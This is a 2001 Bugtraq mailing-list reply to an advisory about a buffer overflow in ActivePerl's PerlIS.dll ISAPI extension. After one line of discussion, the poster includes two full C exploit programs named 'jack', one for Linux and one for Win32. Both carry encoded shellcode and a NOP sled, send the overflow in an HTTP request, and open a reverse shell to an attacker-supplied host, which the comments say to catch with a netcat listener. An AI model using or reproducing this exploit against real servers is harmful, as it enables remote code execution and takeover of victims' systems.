Mailer: SecurityFocus In-Reply-To: <20011116015506.17854.qmail@mail.securityfocus.com> >Received: (qmail 4025 invoked from network); 16 Nov 2001 04:11:34 -0000 >Received: from outgoing2.securityfocus.com (HELO outgoing.securityfocus.com) (66.38.151.26) > by mail.securityfocus.com with SMTP; 16 Nov 2001 04:11:34 -0000 >Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) > by outgoing.securityfocus.com (Postfix) with QMQP > id 78A568F460; Thu, 15 Nov 2001 20:31:32 -0700 (MST) >Mailing-List: contact bugtraq- help@securityfocus.com; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@securityfocus.com> >List-Help: <mailto:bugtraq- help@securityfocus.com> >List-Unsubscribe: <mailto:bugtraq- unsubscribe@securityfocus.com> >List-Subscribe: <mailto:bugtraq- subscribe@securityfocus.com> >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Received: (qmail 26744 invoked from network); 16 Nov 2001 02:03:39 -0000 >Date: 16 Nov 2001 01:55:06 -0000 >Message-ID: <20011116015506.17854.qmail@mail.securityfocus.c om> >Content-Type: text/plain >Content-Disposition: inline >Content-Transfer-Encoding: binary >MIME-Version: 1.0 >X-Mailer: MIME-tools 5.411 (Entity 5.404) >From: Jim <raxor@dexlink.com> >To: bugtraq@securityfocus.com >Subject: Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer > Overflow Vulnerability > >Mailer: SecurityFocus >In-Reply-To: <20011115113830.45A9.SECURITY@nsfocus.com> > >Has anyone been able to duplicate this bug ? > >Am I wrong or does the ISAPI version of ActivePerl >execute .plx files and not .pl as mentioned in the >advisory ? > Not only could I duplicate it, I exploited it. The exploit uses .pl as the extension. Cheers, Indigo. Jack for Linux: /* jack.c - Active Perl ISAPI overflow exploit by Indigo <indig0@talk21.com> 2001 Usage: jack <victim host> <victim port> <attacker host> <attacker port> Before executing jack start up a netcat listener with the port set to 'attacker port' eg: nc -l -p 'attacker port' You may need to hit return a few times to get the prompt up main shellcode adapted from jill.c by dark spyrit <dspyrit@beavuh.org> Greets to: Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds */ #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <errno.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <fcntl.h> #include <netdb.h> int main(int argc, char *argv[]) { unsigned char shellcode[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69 \x6e\x2f" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x8b\x94\xf8\x77\x42\x42\x42\x42" "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15 \x90\x90\x90" "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95 \x40\xe2\xfa\x2d\x95\x95" "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96 \xdd\x7e\x60\x7d\x95\x95\x95\x95" "\xc8\x1e\x40\x14 \x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66 \x1e\xe3" "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6 \x78\xc3\xc2\xc4\x1e\xaa" "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1 \x9d\xcc\xca\x16\x52\x91" "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96 \x56\x44\x74\x96\x54\xa6" "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97 \x96\x54\x1e\x95\x96\x56" "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95 \x7d\xe1\x94\x95\x95\xa6\x55" "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41 \xcf\x1e\x4d\x2c\x93\x95\x95\x95" "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95 \x52\xd2\xfd\x95\x95\x95" "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1 \xc5\x18\xd2\x85\xc5" "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5 \x18\xd2\x8d\xc5\x18" "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95 \x95\x18\xd2\xb5\xc5\x6a" "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5 \x1e\xd2\x89\x1c\xd2\xcd\x14" "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95 \x18\xd2\xe5\xc5\x18\xd2" "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95 \x95\x95\x95\xc8\x14" "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2 \x85\x6a\xc2\x71\x6a\xe2" "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2 \x45\x1e\x7d\xc5\xfd" "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10 \x3e\x95\x95\x95\xa6\x55\xc5" "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11 \x02\x95\x95\x95\x1e\x4d" "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2 \x91\x55\x3d\x97\x94" "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2 \x49\xa6\x5c\xc4\xc3" "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1 \xf5\x05\x05\x05\x05\x15" "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95 \x91\x95\x95\xc0\x6a" "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05 \x05\xff\x95\x6a\xa3\xc0" "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05 \x05\x7e\x27\xff\x95\xfd" "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9 \x8d\x05\x05\x05\x05\xe1" "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41 \xff\xa7\x6a\xc2\x49\x7e" "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39 \x10\x55\xe0\x6c\xc4" "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0 \xe1\xc5\xe7\xfa\xf6" "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9 \xfc\xf7\xe7\xf4\xe7" "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0 \x95\xd2\xf0\xe1\xc6" "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6 \xe7\xf0\xf4\xe1\xf0" "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0 \xfe\xdb\xf4\xf8\xf0\xf1" "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9 \xfa\xf6\x95\xc2" "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1 \xd3\xfc\xf9\xf0\x95" "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7 \xfa\xf6\xf0\xe6\xe6\x95" "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2 \xc6\xda\xd6\xde\xa6" "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5 \x95\xe6\xfa\xf6\xfe\xf0" "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1 \x95\xf6\xfa\xfb\xfb" "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3 \x95\xf6\xf8\xf1\xbb" "\xf0\xed\xf0\x95\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x33" "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33 \xdb\xb3\x24\x03\xc3\xff\xe0" "\xeb\xb9\x90\x90\x05\x31\x8c\x6a" "\x2E\x70\x6C\x20\x48\x54\x54\x50\x2F\x31\x2E\x30 \x0D\x0A\x0D\x0A\x00"; int s; unsigned short int a_port; unsigned long a_host; struct hostent *ht; struct sockaddr_in sin; printf ("\njack - Active Perl ISAPI overflow launcher\nby Indigo <indig0@talk21.com> 2001\n\n"); if (argc != 5) { printf ("Usage: %s <victim host> <victim port> <attacker host> <attacker port>\n", argv [0]); exit (1); } if ((ht = gethostbyname(argv[1])) == 0){ herror(argv[1]); exit(1); } sin.sin_port = htons(atoi(argv[2])); a_port = htons(atoi(argv[4])); a_port^=0x9595; sin.sin_family = AF_INET; sin.sin_addr = *((struct in_addr *)ht->h_addr); if ((ht = gethostbyname(argv[3])) == 0){ herror(argv[3]); exit(1); } a_host = *((unsigned long *)ht->h_addr); a_host^=0x95959595; shellcode[745]= (a_port) & 0xff; shellcode[746]= (a_port >> 8) & 0xff; shellcode[750]= (a_host) & 0xff; shellcode[751]= (a_host >> 8) & 0xff; shellcode[752]= (a_host >> 16) & 0xff; shellcode[753]= (a_host >> 24) & 0xff; if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror("socket"); exit(1); } printf("\nSending exploit....\n"); if ((connect(s, (struct sockaddr *) &sin, sizeof (sin))) == -1){ perror("connect"); exit(1); } write(s, shellcode, strlen(shellcode)); sleep (1); close (s); printf ("Exploit sent.\n\n"); exit(0); } <CUT> Jack for Win32: /* jack.c - Active Perl ISAPI overflow exploit by Indigo <indig0@talk21.com> 2001 Usage: jack <victim host> <victim port> <attacker host> <attacker port> Before executing jack start up a netcat listener with the port set to 'attacker port' eg: nc -l -p 'attacker port' You may need to hit return a few times to get the prompt up main shellcode adapted from jill.c by dark spyrit <dspyrit@beavuh.org> Greets to: Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds */ #include <windows.h> #include <stdio.h> #include <winsock.h> void main(int argc, char **argv) { SOCKET s = 0; WSADATA wsaData; int x; unsigned short int a_port; unsigned long a_host; unsigned char shellcode[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69 \x6e\x2f" //GET /cgi-bin/ "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" //offset to return address "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x8b\x94\xf8\x77\x42\x42\x42\x42" "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15 \x90\x90\x90" "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95 \x40\xe2\xfa\x2d\x95\x95" "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96 \xdd\x7e\x60\x7d\x95\x95\x95\x95" "\xc8\x1e\x40\x14 \x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66 \x1e\xe3" "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6 \x78\xc3\xc2\xc4\x1e\xaa" "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1 \x9d\xcc\xca\x16\x52\x91" "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96 \x56\x44\x74\x96\x54\xa6" "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97 \x96\x54\x1e\x95\x96\x56" "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95 \x7d\xe1\x94\x95\x95\xa6\x55" "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41 \xcf\x1e\x4d\x2c\x93\x95\x95\x95" "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95 \x52\xd2\xfd\x95\x95\x95" "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1 \xc5\x18\xd2\x85\xc5" "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5 \x18\xd2\x8d\xc5\x18" "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95 \x95\x18\xd2\xb5\xc5\x6a" "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5 \x1e\xd2\x89\x1c\xd2\xcd\x14" "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95 \x18\xd2\xe5\xc5\x18\xd2" "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95 \x95\x95\x95\xc8\x14" "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2 \x85\x6a\xc2\x71\x6a\xe2" "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2 \x45\x1e\x7d\xc5\xfd" "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10 \x3e\x95\x95\x95\xa6\x55\xc5" "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11 \x02\x95\x95\x95\x1e\x4d" "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2 \x91\x55\x3d\x97\x94" "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2 \x49\xa6\x5c\xc4\xc3" "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1 \xf5\x05\x05\x05\x05\x15" "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95 \x91\x95\x95\xc0\x6a" "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05 \x05\xff\x95\x6a\xa3\xc0" "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05 \x05\x7e\x27\xff\x95\xfd" "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9 \x8d\x05\x05\x05\x05\xe1" "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41 \xff\xa7\x6a\xc2\x49\x7e" "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39 \x10\x55\xe0\x6c\xc4" "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0 \xe1\xc5\xe7\xfa\xf6" "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9 \xfc\xf7\xe7\xf4\xe7" "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0 \x95\xd2\xf0\xe1\xc6" "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6 \xe7\xf0\xf4\xe1\xf0" "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0 \xfe\xdb\xf4\xf8\xf0\xf1" "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9 \xfa\xf6\x95\xc2" "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1 \xd3\xfc\xf9\xf0\x95" "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7 \xfa\xf6\xf0\xe6\xe6\x95" "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2 \xc6\xda\xd6\xde\xa6" "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5 \x95\xe6\xfa\xf6\xfe\xf0" "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1 \x95\xf6\xfa\xfb\xfb" "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3 \x95\xf6\xf8\xf1\xbb" "\xf0\xed\xf0\x95\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x33" "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33 \xdb\xb3\x24\x03\xc3\xff\xe0" "\xeb\xb9\x90\x90\x05\x31\x8c\x6a" "\x2E\x70\x6C\x20\x48\x54\x54\x50\x2F\x31\x2E\x30 \x0D\x0A\x0D\x0A\x00"; //.pl HTTP/1.0 \n\n printf ("\njack - Active Perl ISAPI overflow launcher\nby Indigo <indig0@talk21.com> 2001\n\n"); if (argc < 2) { printf ("Usage: %s <victim host> <victim port> <attacker host> <attacker port>\n", argv [0]); exit (0); } a_port = htons(atoi(argv[4])); a_port^=0x9595; a_host = inet_addr(argv[3]); a_host^=0x95959595; shellcode[745]= (a_port) & 0xff; shellcode[746]= (a_port >> 8) & 0xff; shellcode[750]= (a_host) & 0xff; shellcode[751]= (a_host >> 8) & 0xff; shellcode[752]= (a_host >> 16) & 0xff; shellcode[753]= (a_host >> 24) & 0xff; WSAStartup (MAKEWORD(2,0), &wsaData); s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); if (INVALID_SOCKET != s) { SOCKADDR_IN anAddr; anAddr.sin_family = AF_INET; anAddr.sin_port = htons (atoi(argv [2])); anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]); if (connect(s, (struct sockaddr *) &anAddr, sizeof (struct sockaddr)) == 0) { printf ("Sending exploit...."); if ((x = send (s, shellcode, strlen(shellcode), 0)) == 0) { printf ("send: error sending first packet\n\n"); exit (0); } printf ("Exploit sent.\n\n"); } closesocket(s); } }
